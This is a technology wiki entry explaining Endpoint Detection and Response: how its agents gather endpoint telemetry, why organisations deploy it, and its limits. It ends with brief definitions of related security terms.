Endpoint Detection and Response — Technology Wiki

Overview

Direct Answer

Endpoint Detection and Response (EDR) is a cybersecurity platform that continuously monitors endpoint devices—such as desktops, laptops, and servers—to identify, investigate, and contain advanced threats in real time. It combines behavioural analytics with forensic capabilities to detect malicious activity that traditional antivirus solutions may miss.

How It Works

EDR agents installed on endpoints collect telemetry data including process execution, network connections, file modifications, and registry changes. This data is analysed against threat intelligence and behavioural baselines to identify anomalies. Upon threat detection, EDR platforms enable security teams to isolate affected devices, terminate malicious processes, and perform deep forensic investigation to understand attack scope and origin.

Why It Matters

Organisations require EDR because sophisticated attackers bypass signature-based defences; EDR's behavioural detection reduces detection time from hours to minutes, minimising breach impact. Regulatory frameworks increasingly mandate threat detection capabilities, and EDR provides the forensic evidence required for incident response and compliance audits.

Common Applications

Financial institutions deploy EDR to detect insider threats and data exfiltration. Healthcare organisations use it to protect patient data from ransomware. Manufacturing firms leverage EDR to identify industrial espionage and supply chain compromise attempts.

Key Considerations

EDR generates high volumes of telemetry requiring significant infrastructure investment and skilled analysts to investigate alerts; false positive rates vary significantly between platforms. Endpoint visibility is limited to managed devices, leaving unmonitored infrastructure and shadow IT exposure unaddressed.

Related in Defensive Security

Security Operations Centre

A centralised facility where security professionals monitor, detect, analyse, and respond to cybersecurity incidents.

Intrusion Detection System

A system that monitors network traffic or system activities for malicious activity or policy violations.

Next-Generation Firewall

An advanced firewall that goes beyond traditional packet filtering to include application awareness and intrusion prevention.

Security Orchestration Automation and Response

Technology that automates security operations by orchestrating tools and processes for incident response.

Incident Response Plan

A documented set of procedures for detecting, responding to, and recovering from cybersecurity incidents.

Digital Forensics

The process of collecting, preserving, and analysing electronic evidence for investigating security incidents.

Honeypot

A decoy system designed to attract attackers and study their methods while protecting real systems.

Extended Detection and Response

A unified security platform that integrates data from endpoints, networks, cloud workloads, and email to provide holistic threat detection, investigation, and automated response.

Security Orchestration, Automation and Response

A technology stack that integrates security tools and automates incident response workflows, enabling faster triage, investigation, and remediation of security alerts.

Threat Hunting

The proactive search for cyber threats within an organisation's environment that have evaded automated detection, using hypotheses, threat intelligence, and advanced analytics.

More in Cybersecurity

Biometric Authentication

Identity & Access

Using unique biological characteristics like fingerprints, facial features, or iris patterns to verify identity.

Blue Team

Offensive Security

A group of security professionals who defend against both real attackers and simulated attacks from red teams.

Privileged Access Management

Identity & Access

Security solutions that control and monitor access for users with elevated permissions to critical systems.

Security Information and Event Management

Offensive Security

Technology that aggregates and analyses security data from across an organisation to detect threats.

Cybersecurity

Offensive Security

The practice of protecting systems, networks, and programs from digital attacks, unauthorised access, and data breaches.

Malware

Offensive Security

Malicious software designed to disrupt, damage, or gain unauthorised access to computer systems.

Spear Phishing

Offensive Security

A targeted phishing attack directed at specific individuals or organisations using personalised deceptive content.

End-to-End Encryption

Data Protection

A communication system where only the communicating users can read the messages, with encryption at both endpoints.